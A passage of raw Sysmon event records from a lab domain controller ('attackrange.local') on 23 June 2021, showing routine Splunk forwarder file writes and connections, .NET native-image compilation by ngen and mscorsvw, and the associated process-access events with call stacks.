Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34DB03FEA88C70FA10D45A6C51EB4767,SHA256=6DEAC778DADA9C81DFA950A94E5BA3B0A05B42282DC4B4F76445B1BD3CDCD2C0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:40.341{4DB9351A-A223-60D3-7C04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1898-0\System.Deployment.dll2021-06-23 21:05:40.341 23542300x800000000000000021606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:41.638{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C47036AEFBD5F4CF326DAE38E78D1D9,SHA256=B08873BE4A628EE8DE87B8DF06BCCDDB4A11498C3CE5AFF97F64492E92AFD47C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:41.560{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A53861522D681CE309A89016B5FCE91E,SHA256=D80DCC8A969B5FC1C2E41E8CC3632D9D2C84D0F0664087FC6D6608F4ED1A31F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000021604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:39.162{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61441-false10.0.1.12-8089- 23542300x800000000000000021607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:42.654{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ECAD8F000173F42D2A0796567B66CC4,SHA256=3EC57827154AF4B86E65183B55A585FAD1944B007AF6BD65A289D3FBFE82755E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:43.685{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97CA121D696E4D1A32E17FD094AFF115,SHA256=D978BC910E59FFD22F36D762A5A4D6914C4BC951CFDEB728D9E6F53B371C1B1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:44.716{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E35CDEF3F5FECFB8E7F71D876AF1A0A9,SHA256=92EED0AF9B60BECBF246ACDFC15A3DE6AC191AB403FD3FAB6307BF4CDD911C61,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:44.669{4DB9351A-A224-60D3-7E04-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a0c-0\System.Design.dll2021-06-23 21:05:44.669 354300x800000000000000021609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:42.161{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61442-false10.0.1.12-8000- 11241100x800000000000000021626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:45.903{4DB9351A-A229-60D3-8204-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cd8-0\System.DirectoryServices.AccountManagement.dll2021-06-23 21:05:45.903 23542300x800000000000000021625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.763{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA7EA006F8BF19EACF68087C1E5136BE,SHA256=0542BCBB1D80A768298ABED7F3A5A176580110E631D1A0F5232528C2412015B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.497{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A229-60D3-8204-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.466{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-8204-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.466{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-8204-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.388{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A229-60D3-8104-00000000CF01}6680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.357{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-8104-00000000CF01}6680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.357{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-8104-00000000CF01}6680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:45.263{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\191c-0\System.Device.dll2021-06-23 21:05:45.263 10341000x800000000000000021617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.169{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.138{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.138{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-8004-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A229-60D3-7F04-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.044{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A229-60D3-7F04-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:45.044{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A229-60D3-7F04-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:46.919{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c38-0\System.Drawing.Design.dll2021-06-23 21:05:46.919 23542300x800000000000000021641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.778{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=639C76E410F96BCB7ACFE314A86B18C3,SHA256=773047EE17827F637B5976DA9C864A3DE36827703C243A3899FA423C0D437F3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.732{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.701{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8604-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.653{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8504-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.606{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8504-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.606{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8504-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc